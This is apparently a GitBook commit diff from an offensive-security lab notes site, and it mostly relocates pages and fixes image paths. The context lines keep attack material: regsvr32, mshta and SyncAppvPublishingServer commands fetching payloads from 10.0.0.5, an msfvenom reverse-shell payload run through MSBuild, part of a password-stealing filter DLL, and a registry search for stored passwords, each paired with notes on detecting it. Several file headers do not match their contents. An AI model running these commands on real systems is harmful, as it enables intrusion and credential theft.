GitBook: [master] 224 pages modified

Author: mantvydasb

SUMMARY.md

@@ -8,7 +8,7 @@ description: >-
 
 ## Injecting Shellcode
 
-Firstly, let's use an [injector](../offensive-security/t1055-process-injection/process-injection.md) program we wrote earlier to inject some shellcode into a process that will give us a reverse shell. In this case, we are injecting the shellcode into explorer.exe:
+Firstly, let's use an [injector](../offensive-security/code-injection-process-injection/process-injection.md) program we wrote earlier to inject some shellcode into a process that will give us a reverse shell. In this case, we are injecting the shellcode into explorer.exe:
 
 ![](../.gitbook/assets/injected-threads-explorer-injected.png)
 

memory-forensics/dump-virtual-box-memory.md miscellaneous-reversing-forensics/dump-virtual-box-memory.md

@@ -202,7 +202,7 @@ Continuing further:
 
 It is possible to abuse the PEB structure and masquerade one windows processes with another process. See this lab for more:
 
-{% page-ref page="../offensive-security-experiments/masquerading-processes-in-userland-through-\_peb.md" %}
+{% page-ref page="../offensive-security/defense-evasion/masquerading-processes-in-userland-through-\_peb.md" %}
 
 ## References
 

memory-forensics/get-injectedthread.md miscellaneous-reversing-forensics/get-injectedthread.md

@@ -2,7 +2,7 @@
 
 In this lab I'm trying to get code execution with `SYSTEM` level privileges on a DC that runs a DNS service as originally researched by Shay Ber [here](https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83).
 
-The attack relies on a [DLL injection](../../offensive-security/t1055-process-injection/dll-injection.md) into the dns service running as SYSTEM on the DNS server which most of the time is on a Domain Contoller.
+The attack relies on a [DLL injection](../../offensive-security/code-injection-process-injection/dll-injection.md) into the dns service running as SYSTEM on the DNS server which most of the time is on a Domain Contoller.
 
 ## Execution
 

offensive-security/pe-file-header-parser-in-c++.md miscellaneous-reversing-forensics/pe-file-header-parser-in-c++.md

@@ -0,0 +1,2 @@
+# Code Execution
+

memory-forensics/process-environment-block.md miscellaneous-reversing-forensics/process-environment-block.md

@@ -36,13 +36,13 @@ wmic os get /FORMAT:"evil.xsl"
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/screenshot-from-2019-04-10-22-05-24.png)
+![](../../.gitbook/assets/screenshot-from-2019-04-10-22-05-24.png)
 
 ## Observation
 
 Calculator is spawned by svchost.exe:
 
-![](../.gitbook/assets/screenshot-from-2019-04-10-21-57-52.png)
+![](../../.gitbook/assets/screenshot-from-2019-04-10-21-57-52.png)
 
 ## References
 

ctfs-walkthroughs/reversing-password-checking-routine.md miscellaneous-reversing-forensics/reversing-password-checking-routine.md

@@ -10,7 +10,7 @@ Constrained Language Mode in short locks down the nice features of Powershell us
 
 For fun - creating another powershell instance inside powershell without actually spawning a new `powershell.exe` process:
 
-![](../.gitbook/assets/ps-invoke.gif)
+![](../../.gitbook/assets/ps-invoke.gif)
 
 ## Constrained Language Mode
 
@@ -27,19 +27,19 @@ PS C:\Users\mantvydas> $ExecutionContext.SessionState.LanguageMode
 ConstrainedLanguage
 ```
 
-![](../.gitbook/assets/ps-constrained.png)
+![](../../.gitbook/assets/ps-constrained.png)
 
 With `ConstrainedLanguage`, trying to download a file from remote machine, we get `Access Denied`:
 
-![](../.gitbook/assets/ps-constrained-download-denied.png)
+![](../../.gitbook/assets/ps-constrained-download-denied.png)
 
 However, if you have access to the system and enough privileges to change environment variables, the lock can be lifted by removing the variable `__PSLockdownPolicy` and re-spawning another powershell instance.
 
 ### Powershell Downgrade
 
 If you have the ability to downgrade to Powershell 2.0, this can allow you to bypass the `ConstrainedLanguage`mode. Note how `$ExecutionContext.SessionState.LanguageMode` keeps returning `ConstrainedLangue` in powershell instances that were not launched with `-version Powershell 2` until it does not:
 
-![](../.gitbook/assets/ps-downgrade.png)
+![](../../.gitbook/assets/ps-downgrade.png)
 
 ## References
 

offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise.md

@@ -10,7 +10,7 @@ If you run into a situation where powershell.exe is blocked and no strict applic
 rundll32.exe PowerShdll.dll,main
 ```
 
-![](../.gitbook/assets/pwshll-rundll32.gif)
+![](../../.gitbook/assets/pwshll-rundll32.gif)
 
 Note that the same could be achieved with a compiled .exe binary from the same project, but keep in mind that .exe is more likely to run into whitelisting issues.
 
@@ -22,9 +22,9 @@ Windows 10 comes with `SyncAppvPublishingServer.exe and` `SyncAppvPublishingServ
 SyncAppvPublishingServer.vbs "Break; iwr http://10.0.0.5:443"
 ```
 
-![](../.gitbook/assets/pwshll-syncappvpublishingserver.png)
+![](../../.gitbook/assets/pwshll-syncappvpublishingserver.png)
 
-![](../.gitbook/assets/pwshll-syncappvpublishingserver.gif)
+![](../../.gitbook/assets/pwshll-syncappvpublishingserver.gif)
 
 ## References
 

offensive-security/code-execution/README.md

@@ -37,15 +37,15 @@ regsvr32.exe /s /i:http://10.0.0.5/back.sct scrobj.dll
 
 ## Observations
 
-![calc.exe spawned by regsvr32.exe](../.gitbook/assets/regsvr32.png)
+![calc.exe spawned by regsvr32.exe](../../.gitbook/assets/regsvr32.png)
 
 Note how regsvr32 process exits almost immediately. This means that just by looking at the list of processes on the victim machine, the evil process may not be immedialy evident... Not until you realise how it was invoked though. Sysmon commandline logging may help you detect this activity:
 
-![](../.gitbook/assets/regsvr32-commandline.png)
+![](../../.gitbook/assets/regsvr32-commandline.png)
 
 Additionally, of course sysmon will show regsvr32 establishing a network connection:
 
-![](../.gitbook/assets/regsvr32-network.png)
+![](../../.gitbook/assets/regsvr32-network.png)
 
 ## References
 

offensive-security/application-whitelisting-bypass-with-wmic-and-xsl.md offensive-security/code-execution/application-whitelisting-bypass-with-wmic-and-xsl.md

@@ -42,13 +42,13 @@ Hello From Uninstall...I carry out the real work...
 
 Enjoy the sweet reverse shell:
 
-![](../.gitbook/assets/installutil-shell.png)
+![](../../.gitbook/assets/installutil-shell.png)
 
 ## Observations
 
 Look for `InstallUtil` processes that have established connections, especially those with cmd or powershell processes running as children - you should treat them as suspicious and investigate the endpoint closer:
 
-![](../.gitbook/assets/installutil-procexp.png)
+![](../../.gitbook/assets/installutil-procexp.png)
 
 A very primitive query in kibana allowing to find events where InstallUtil spawns cmd:
 
@@ -60,9 +60,9 @@ event_data.ParentCommandLine:"*installutil.exe*" && event_data.Image:cmd.exe
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![InstallUtil launching the malicious payload](../.gitbook/assets/installutil-kibana.png)
+![InstallUtil launching the malicious payload](../../.gitbook/assets/installutil-kibana.png)
 
-![csc.exe created a temp.exe which contains the reverse shell payload](../.gitbook/assets/installutils-csc.png)
+![csc.exe created a temp.exe which contains the reverse shell payload](../../.gitbook/assets/installutils-csc.png)
 
 What is interesting is that I could not see an established network connection logged in sysmon logs, although I could see other network connections from the victim machine being logged.
 

offensive-security/powershell-constrained-language-mode-bypass.md offensive-security/code-execution/powershell-constrained-language-mode-bypass.md

@@ -46,15 +46,15 @@ Invoking the scriptlet file hosted remotely:
 
 As expected, calc.exe is spawned by mshta.exe. Worth noting that mhsta and cmd exit almost immediately after invoking the calc.exe:
 
-![](../.gitbook/assets/mshta-calc.png)
+![](../../.gitbook/assets/mshta-calc.png)
 
 As a defender, look at sysmon logs for mshta establishing network connections:
 
-![](../.gitbook/assets/mshta-connection.png)
+![](../../.gitbook/assets/mshta-connection.png)
 
 Also, suspicious commandlines:
 
-![](../.gitbook/assets/mshta-commandline.png)
+![](../../.gitbook/assets/mshta-commandline.png)
 
 ## Bonus
 
@@ -64,11 +64,11 @@ The hta file can be invoked like so:
 mshta.exe http://10.0.0.5/m.hta
 ```
 
-![](../.gitbook/assets/mshta-calc2.png)
+![](../../.gitbook/assets/mshta-calc2.png)
 
 or by navigating to the file itself, launching it and clicking run:
 
-![](../.gitbook/assets/mshta-url.png)
+![](../../.gitbook/assets/mshta-url.png)
 
 {% code-tabs %}
 {% code-tabs-item title="http://10.0.0.5/m.hta" %}

offensive-security/powershell-without-powershell.md offensive-security/code-execution/powershell-without-powershell.md

@@ -49,13 +49,13 @@ PS C:\experiments\cmstp> cmstp.exe /s .\f.inf
 
 Rundll32 is spawned which then establishes the connection back to the attacker:
 
-![](../.gitbook/assets/cmstp-rundll32.png)
+![](../../.gitbook/assets/cmstp-rundll32.png)
 
 A very privitive way of hunting for suspicious instances of rundll32 initiating connections would be skimming through the sysmon logs and looking for network connections being established by rundll32 immediately/soon after it had been spawned by cmstp.
 
 Note how the connection was established one second after the process creation. This behaviour depends on what the payload is supposed to do, but if the payload is a reverse shell, it usually attempts connecting back immediately upon execution, which is exactly our case:
 
-![](../.gitbook/assets/cmstp-kibana%20%281%29.png)
+![](../../.gitbook/assets/cmstp-kibana%20%281%29.png)
 
 ## References
 

offensive-security/t1117-regsvr32-aka-squiblydoo.md offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo.md

@@ -25,11 +25,11 @@ listening on [any] 4444 ...
 
 We can see that the .cpl is simply a DLL with DllMain function exported:
 
-![](../.gitbook/assets/lnk-dllmain%20%281%29.png)
+![](../../.gitbook/assets/lnk-dllmain%20%281%29.png)
 
 A quick look at the dissasembly of the dll suggests that rundll32.exe will be spawned, a new thread will be created in suspended mode, which most likely will get injected with our shellcode and eventually resumed to execute that shellcode:
 
-![](../.gitbook/assets/lnk-dissasm.png)
+![](../../.gitbook/assets/lnk-dissasm.png)
 
 Invoking the shellcode via control.exe:
 
@@ -62,11 +62,11 @@ Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
 Note how rundll32 spawns cmd.exe and establishes a connection back to the attacker - these are signs that should raise your suspicion when investingating a host for a compromise:
 
-![](../.gitbook/assets/lnk-connection.png)
+![](../../.gitbook/assets/lnk-connection.png)
 
 As always, sysmon logging can help in finding suspicious commandlines being executed in your environment:
 
-![](../.gitbook/assets/lnk-sysmon%20%281%29.png)
+![](../../.gitbook/assets/lnk-sysmon%20%281%29.png)
 
 ## Bonus - Create Shortcut With PowerShell
 

offensive-security/t1118-installutil.md offensive-security/code-execution/t1118-installutil.md

@@ -12,15 +12,15 @@ This technique launches an executable without a cmd.exe.
 forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
 ```
 
-![](../.gitbook/assets/forfiles-executed.png)
+![](../../.gitbook/assets/forfiles-executed.png)
 
 ## Observations
 
 Defenders can monitor for process creation/commandline logs to detect this activity:
 
-![](../.gitbook/assets/forfiles-ancestry.png)
+![](../../.gitbook/assets/forfiles-ancestry.png)
 
-![](../.gitbook/assets/forfiles-cmdline.png)
+![](../../.gitbook/assets/forfiles-cmdline.png)
 
 ## References
 

offensive-security/t1170-mshta-code-execution.md offensive-security/code-execution/t1170-mshta-code-execution.md

@@ -47,13 +47,13 @@ cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1
 
 Calc.exe gets spawned by cscript.exe which immediately closes leaving the calc.exe process orphan:
 
-![](../.gitbook/assets/pubprn-csript.png)
+![](../../.gitbook/assets/pubprn-csript.png)
 
-![](../.gitbook/assets/pubprn-ancestry.png)
+![](../../.gitbook/assets/pubprn-ancestry.png)
 
 Monitoring commandlines can be useful in detecting the script being abused:
 
-![](../.gitbook/assets/pubprn-logs.png)
+![](../../.gitbook/assets/pubprn-logs.png)
 
 ## References
 

offensive-security/t1191-cmstp-code-execution.md offensive-security/code-execution/t1191-cmstp-code-execution.md

@@ -14,7 +14,7 @@ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f csharp
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/screenshot-from-2019-04-04-20-53-21.png)
+![](../../.gitbook/assets/screenshot-from-2019-04-04-20-53-21.png)
 
 Insert shellcode into the shellcode variable in linne 46:
 
@@ -88,7 +88,7 @@ Insert shellcode into the shellcode variable in linne 46:
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/screenshot-from-2019-04-04-20-54-14.png)
+![](../../.gitbook/assets/screenshot-from-2019-04-04-20-54-14.png)
 
 Spin up a handler in metasploit to catch your shell:
 
@@ -110,7 +110,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\bad\bad.xml
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/peek-2019-04-04-20-57.gif)
+![](../../.gitbook/assets/peek-2019-04-04-20-57.gif)
 
 ## Observation
 

offensive-security/t1196-control-panel-item-code-execution.md offensive-security/code-execution/t1196-control-panel-item-code-execution.md

@@ -0,0 +1,2 @@
+# Code and Process Injection
+

offensive-security/t1202-forfiles-indirect-command-execution.md offensive-security/code-execution/t1202-forfiles-indirect-command-execution.md

@@ -30,9 +30,9 @@ This test was done on Windows 7
 
 Below are two links where we explore the PEB in a bit more depth:
 
-{% page-ref page="../../memory-forensics/process-environment-block.md" %}
+{% page-ref page="../../miscellaneous-reversing-forensics/process-environment-block.md" %}
 
-{% page-ref page="../../offensive-security-experiments/masquerading-processes-in-userland-through-\_peb.md" %}
+{% page-ref page="../defense-evasion/masquerading-processes-in-userland-through-\_peb.md" %}
 
 ## Windows 10
 

offensive-security/t1216-signed-script-ce.md offensive-security/code-execution/t1216-signed-script-ce.md

@@ -19,7 +19,7 @@ Shout out to [Mumbai](https://twitter.com/ilove2pwn_) for a great debugging sess
 
 If you need more info on parsing Windows PE files, see my previous lab:
 
-{% page-ref page="../pe-file-header-parser-in-c++.md" %}
+{% page-ref page="../../miscellaneous-reversing-forensics/pe-file-header-parser-in-c++.md" %}
 
 ## Execution
 
@@ -36,7 +36,7 @@ Let's start calc.exe as our host / destination process - this is going to be the
 
 ### Destination ImageBaseAddress
 
-Now, in order to hollow out the destination process, we need to know its `ImageBaseAddress`. We can get the location of image base address from the [PEB](../../memory-forensics/process-environment-block.md) structure of the host process via WinDBG - we know that the PEB is located at 0100e000:
+Now, in order to hollow out the destination process, we need to know its `ImageBaseAddress`. We can get the location of image base address from the [PEB](../../miscellaneous-reversing-forensics/process-environment-block.md) structure of the host process via WinDBG - we know that the PEB is located at 0100e000:
 
 ![](../../.gitbook/assets/screenshot-from-2019-04-28-16-36-33.png)
 
@@ -401,5 +401,5 @@ What an amazing resource for those interested in detecting process hollowing usi
 
 {% embed url="https://attack.mitre.org/techniques/T1093/" %}
 
-{% page-ref page="../pe-file-header-parser-in-c++.md" %}
+{% page-ref page="../../miscellaneous-reversing-forensics/pe-file-header-parser-in-c++.md" %}
 

offensive-security/using-msbuild-to-execute-shellcode-in-c.md offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c.md

@@ -0,0 +1,2 @@
+# Credential Access and Credential Dumping
+

offensive-security/code-injection-process-injection/README.md

@@ -20,7 +20,7 @@ reg query "hklm\system\currentcontrolset\control\lsa" /v "notification packages"
 
 Or via regedit:
 
-![](../.gitbook/assets/password-filter-regedit.png)
+![](../../.gitbook/assets/password-filter-regedit.png)
 
 Building an evil filter DLL based on a great [article](http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html) by mubix. He has also kindly provided the code to use, which I modified slightly to make sure that the critical DLL functions were exported correctly in order for this technique to work, since mubix's code did not work for me out of the box. I also had to change the logging statements in order to rectify a couple of compiler issues:
 
@@ -86,7 +86,7 @@ extern "C" __declspec(dllexport) NTSTATUS __stdcall PasswordChangeNotify(
 }
 ```
 
-{% file src="../.gitbook/assets/evilpwfilter.dll" caption="Password Filter DLL" %}
+{% file src="../../.gitbook/assets/evilpwfilter.dll" caption="Password Filter DLL" %}
 
 Injecting the evil password filter into the victim system:
 
@@ -101,29 +101,29 @@ The operation completed successfully.
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/password-filter-updating-registry.png)
+![](../../.gitbook/assets/password-filter-updating-registry.png)
 
 Testing password changes after the reboot - note how the password changes are getting logged:
 
-![](../.gitbook/assets/password-filter-filter-working.png)
+![](../../.gitbook/assets/password-filter-filter-working.png)
 
 ## Observations
 
 Windows event `4614` notifies about new packages loaded by the SAM:
 
-![](../.gitbook/assets/password-filter-log1.png)
+![](../../.gitbook/assets/password-filter-log1.png)
 
 Logging command line can also help in detecting this activity:
 
-![](../.gitbook/assets/password-filter-cmdline.png)
+![](../../.gitbook/assets/password-filter-cmdline.png)
 
 ...especially, if the package has just been recently dropped to disk:
 
-![](../.gitbook/assets/password-filter-createdtime.png)
+![](../../.gitbook/assets/password-filter-createdtime.png)
 
 Also, it may be worth considering checking new DLLs dropped to `%systemroot%\system32` for exported `PasswordChangeNotify`function:
 
-![](../.gitbook/assets/password-filter.png)
+![](../../.gitbook/assets/password-filter.png)
 
 ## References
 

offensive-security/t1055-process-injection/dll-injection.md offensive-security/code-injection-process-injection/dll-injection.md

@@ -22,7 +22,7 @@ reg query HKCU /f password /t REG_SZ /s
 
 As a defender, you may want to monitor commandline argument logs and look for any that include `req query` and `password`strings:
 
-![](../.gitbook/assets/passwords-registry.png)
+![](../../.gitbook/assets/passwords-registry.png)
 
 ## References
 

offensive-security/t1055-process-injection/loading-and-executing-shellcode-from-portable-executable-resources.md offensive-security/code-injection-process-injection/loading-and-executing-shellcode-from-portable-executable-resources.md

@@ -0,0 +1,2 @@
+# Defense Evasion
+